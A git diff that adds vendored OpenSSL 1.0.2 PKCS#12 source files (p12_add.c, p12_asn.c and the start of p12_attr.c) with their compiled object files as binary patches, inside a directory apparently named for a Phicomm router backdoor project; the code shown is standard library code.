diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_add.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_add.c
new file mode 100644
index 0000000..982805d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_add.c
@@ -0,0 +1,245 @@
+/* p12_add.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+/* Pack an object into an OCTET STRING and turn into a safebag */
+
+PKCS12_SAFEBAG *PKCS12_item_pack_safebag(void *obj, const ASN1_ITEM *it,
+                                         int nid1, int nid2)
+{
+    PKCS12_BAGS *bag;
+    PKCS12_SAFEBAG *safebag;
+    if (!(bag = PKCS12_BAGS_new())) {
+        PKCS12err(PKCS12_F_PKCS12_ITEM_PACK_SAFEBAG, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    bag->type = OBJ_nid2obj(nid1);
+    if (!ASN1_item_pack(obj, it, &bag->value.octet)) {
+        PKCS12err(PKCS12_F_PKCS12_ITEM_PACK_SAFEBAG, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    if (!(safebag = PKCS12_SAFEBAG_new())) {
+        PKCS12err(PKCS12_F_PKCS12_ITEM_PACK_SAFEBAG, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    safebag->value.bag = bag;
+    safebag->type = OBJ_nid2obj(nid2);
+    return safebag;
+}
+
+/* Turn PKCS8 object into a keybag */
+
+PKCS12_SAFEBAG *PKCS12_MAKE_KEYBAG(PKCS8_PRIV_KEY_INFO *p8)
+{
+    PKCS12_SAFEBAG *bag;
+    if (!(bag = PKCS12_SAFEBAG_new())) {
+        PKCS12err(PKCS12_F_PKCS12_MAKE_KEYBAG, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    bag->type = OBJ_nid2obj(NID_keyBag);
+    bag->value.keybag = p8;
+    return bag;
+}
+
+/* Turn PKCS8 object into a shrouded keybag */
+
+PKCS12_SAFEBAG *PKCS12_MAKE_SHKEYBAG(int pbe_nid, const char *pass,
+                                     int passlen, unsigned char *salt,
+                                     int saltlen, int iter,
+                                     PKCS8_PRIV_KEY_INFO *p8)
+{
+    PKCS12_SAFEBAG *bag;
+    const EVP_CIPHER *pbe_ciph;
+
+    /* Set up the safe bag */
+    if (!(bag = PKCS12_SAFEBAG_new())) {
+        PKCS12err(PKCS12_F_PKCS12_MAKE_SHKEYBAG, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    bag->type = OBJ_nid2obj(NID_pkcs8ShroudedKeyBag);
+
+    pbe_ciph = EVP_get_cipherbynid(pbe_nid);
+
+    if (pbe_ciph)
+        pbe_nid = -1;
+
+    if (!(bag->value.shkeybag =
+          PKCS8_encrypt(pbe_nid, pbe_ciph, pass, passlen, salt, saltlen, iter,
+                        p8))) {
+        PKCS12err(PKCS12_F_PKCS12_MAKE_SHKEYBAG, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    return bag;
+}
+
+/* Turn a stack of SAFEBAGS into a PKCS#7 data Contentinfo */
+PKCS7 *PKCS12_pack_p7data(STACK_OF(PKCS12_SAFEBAG) *sk)
+{
+    PKCS7 *p7;
+    if (!(p7 = PKCS7_new())) {
+        PKCS12err(PKCS12_F_PKCS12_PACK_P7DATA, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    p7->type = OBJ_nid2obj(NID_pkcs7_data);
+    if (!(p7->d.data = M_ASN1_OCTET_STRING_new())) {
+        PKCS12err(PKCS12_F_PKCS12_PACK_P7DATA, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (!ASN1_item_pack(sk, ASN1_ITEM_rptr(PKCS12_SAFEBAGS), &p7->d.data)) {
+        PKCS12err(PKCS12_F_PKCS12_PACK_P7DATA, PKCS12_R_CANT_PACK_STRUCTURE);
+        return NULL;
+    }
+    return p7;
+}
+
+/* Unpack SAFEBAGS from PKCS#7 data ContentInfo */
+STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_p7data(PKCS7 *p7)
+{
+    if (!PKCS7_type_is_data(p7)) {
+        PKCS12err(PKCS12_F_PKCS12_UNPACK_P7DATA,
+                  PKCS12_R_CONTENT_TYPE_NOT_DATA);
+        return NULL;
+    }
+    return ASN1_item_unpack(p7->d.data, ASN1_ITEM_rptr(PKCS12_SAFEBAGS));
+}
+
+/* Turn a stack of SAFEBAGS into a PKCS#7 encrypted data ContentInfo */
+
+PKCS7 *PKCS12_pack_p7encdata(int pbe_nid, const char *pass, int passlen,
+                             unsigned char *salt, int saltlen, int iter,
+                             STACK_OF(PKCS12_SAFEBAG) *bags)
+{
+    PKCS7 *p7;
+    X509_ALGOR *pbe;
+    const EVP_CIPHER *pbe_ciph;
+    if (!(p7 = PKCS7_new())) {
+        PKCS12err(PKCS12_F_PKCS12_PACK_P7ENCDATA, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    if (!PKCS7_set_type(p7, NID_pkcs7_encrypted)) {
+        PKCS12err(PKCS12_F_PKCS12_PACK_P7ENCDATA,
+                  PKCS12_R_ERROR_SETTING_ENCRYPTED_DATA_TYPE);
+        return NULL;
+    }
+
+    pbe_ciph = EVP_get_cipherbynid(pbe_nid);
+
+    if (pbe_ciph)
+        pbe = PKCS5_pbe2_set(pbe_ciph, iter, salt, saltlen);
+    else
+        pbe = PKCS5_pbe_set(pbe_nid, iter, salt, saltlen);
+
+    if (!pbe) {
+        PKCS12err(PKCS12_F_PKCS12_PACK_P7ENCDATA, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    X509_ALGOR_free(p7->d.encrypted->enc_data->algorithm);
+    p7->d.encrypted->enc_data->algorithm = pbe;
+    M_ASN1_OCTET_STRING_free(p7->d.encrypted->enc_data->enc_data);
+    if (!(p7->d.encrypted->enc_data->enc_data =
+          PKCS12_item_i2d_encrypt(pbe, ASN1_ITEM_rptr(PKCS12_SAFEBAGS), pass,
+                                  passlen, bags, 1))) {
+        PKCS12err(PKCS12_F_PKCS12_PACK_P7ENCDATA, PKCS12_R_ENCRYPT_ERROR);
+        return NULL;
+    }
+
+    return p7;
+}
+
+STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_p7encdata(PKCS7 *p7, const char *pass,
+                                                  int passlen)
+{
+    if (!PKCS7_type_is_encrypted(p7))
+        return NULL;
+    return PKCS12_item_decrypt_d2i(p7->d.encrypted->enc_data->algorithm,
+                                   ASN1_ITEM_rptr(PKCS12_SAFEBAGS),
+                                   pass, passlen,
+                                   p7->d.encrypted->enc_data->enc_data, 1);
+}
+
+PKCS8_PRIV_KEY_INFO *PKCS12_decrypt_skey(PKCS12_SAFEBAG *bag,
+                                         const char *pass, int passlen)
+{
+    return PKCS8_decrypt(bag->value.shkeybag, pass, passlen);
+}
+
+int PKCS12_pack_authsafes(PKCS12 *p12, STACK_OF(PKCS7) *safes)
+{
+    if (ASN1_item_pack(safes, ASN1_ITEM_rptr(PKCS12_AUTHSAFES),
+                       &p12->authsafes->d.data))
+        return 1;
+    return 0;
+}
+
+STACK_OF(PKCS7) *PKCS12_unpack_authsafes(PKCS12 *p12)
+{
+    if (!PKCS7_type_is_data(p12->authsafes)) {
+        PKCS12err(PKCS12_F_PKCS12_UNPACK_AUTHSAFES,
+                  PKCS12_R_CONTENT_TYPE_NOT_DATA);
+        return NULL;
+    }
+    return ASN1_item_unpack(p12->authsafes->d.data,
+                            ASN1_ITEM_rptr(PKCS12_AUTHSAFES));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_add.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_add.o
new file mode 100644
index 0000000000000000000000000000000000000000..7dc1d1d0da8d77323f5c56a529d3d9415da02682
GIT binary patch
literal 5640
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_asn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_asn.c
new file mode 100644
index 0000000..370ddbd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_asn.c
@@ -0,0 +1,125 @@
+/* p12_asn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pkcs12.h>
+
+/* PKCS#12 ASN1 module */
+
+ASN1_SEQUENCE(PKCS12) = {
+        ASN1_SIMPLE(PKCS12, version, ASN1_INTEGER),
+        ASN1_SIMPLE(PKCS12, authsafes, PKCS7),
+        ASN1_OPT(PKCS12, mac, PKCS12_MAC_DATA)
+} ASN1_SEQUENCE_END(PKCS12)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS12)
+
+ASN1_SEQUENCE(PKCS12_MAC_DATA) = {
+        ASN1_SIMPLE(PKCS12_MAC_DATA, dinfo, X509_SIG),
+        ASN1_SIMPLE(PKCS12_MAC_DATA, salt, ASN1_OCTET_STRING),
+        ASN1_OPT(PKCS12_MAC_DATA, iter, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(PKCS12_MAC_DATA)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS12_MAC_DATA)
+
+ASN1_ADB_TEMPLATE(bag_default) = ASN1_EXP(PKCS12_BAGS, value.other, ASN1_ANY, 0);
+
+ASN1_ADB(PKCS12_BAGS) = {
+        ADB_ENTRY(NID_x509Certificate, ASN1_EXP(PKCS12_BAGS, value.x509cert, ASN1_OCTET_STRING, 0)),
+        ADB_ENTRY(NID_x509Crl, ASN1_EXP(PKCS12_BAGS, value.x509crl, ASN1_OCTET_STRING, 0)),
+        ADB_ENTRY(NID_sdsiCertificate, ASN1_EXP(PKCS12_BAGS, value.sdsicert, ASN1_IA5STRING, 0)),
+} ASN1_ADB_END(PKCS12_BAGS, 0, type, 0, &bag_default_tt, NULL);
+
+ASN1_SEQUENCE(PKCS12_BAGS) = {
+        ASN1_SIMPLE(PKCS12_BAGS, type, ASN1_OBJECT),
+        ASN1_ADB_OBJECT(PKCS12_BAGS),
+} ASN1_SEQUENCE_END(PKCS12_BAGS)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS12_BAGS)
+
+ASN1_ADB_TEMPLATE(safebag_default) = ASN1_EXP(PKCS12_SAFEBAG, value.other, ASN1_ANY, 0);
+
+ASN1_ADB(PKCS12_SAFEBAG) = {
+        ADB_ENTRY(NID_keyBag, ASN1_EXP(PKCS12_SAFEBAG, value.keybag, PKCS8_PRIV_KEY_INFO, 0)),
+        ADB_ENTRY(NID_pkcs8ShroudedKeyBag, ASN1_EXP(PKCS12_SAFEBAG, value.shkeybag, X509_SIG, 0)),
+        ADB_ENTRY(NID_safeContentsBag, ASN1_EXP_SET_OF(PKCS12_SAFEBAG, value.safes, PKCS12_SAFEBAG, 0)),
+        ADB_ENTRY(NID_certBag, ASN1_EXP(PKCS12_SAFEBAG, value.bag, PKCS12_BAGS, 0)),
+        ADB_ENTRY(NID_crlBag, ASN1_EXP(PKCS12_SAFEBAG, value.bag, PKCS12_BAGS, 0)),
+        ADB_ENTRY(NID_secretBag, ASN1_EXP(PKCS12_SAFEBAG, value.bag, PKCS12_BAGS, 0))
+} ASN1_ADB_END(PKCS12_SAFEBAG, 0, type, 0, &safebag_default_tt, NULL);
+
+ASN1_SEQUENCE(PKCS12_SAFEBAG) = {
+        ASN1_SIMPLE(PKCS12_SAFEBAG, type, ASN1_OBJECT),
+        ASN1_ADB_OBJECT(PKCS12_SAFEBAG),
+        ASN1_SET_OF_OPT(PKCS12_SAFEBAG, attrib, X509_ATTRIBUTE)
+} ASN1_SEQUENCE_END(PKCS12_SAFEBAG)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS12_SAFEBAG)
+
+/* SEQUENCE OF SafeBag */
+ASN1_ITEM_TEMPLATE(PKCS12_SAFEBAGS) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, PKCS12_SAFEBAGS, PKCS12_SAFEBAG)
+ASN1_ITEM_TEMPLATE_END(PKCS12_SAFEBAGS)
+
+/* Authsafes: SEQUENCE OF PKCS7 */
+ASN1_ITEM_TEMPLATE(PKCS12_AUTHSAFES) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, PKCS12_AUTHSAFES, PKCS7)
+ASN1_ITEM_TEMPLATE_END(PKCS12_AUTHSAFES)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_asn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_asn.o
new file mode 100644
index 0000000000000000000000000000000000000000..a9c81ff3b5c3208b78a67f43d54c3ff261a16f18
GIT binary patch
literal 8968
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
HulD~BStFk+

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_attr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_attr.c
new file mode 100644
index 0000000..fff3ba1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_attr.c
@@ -0,0 +1,147 @@
+/* p12_attr.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
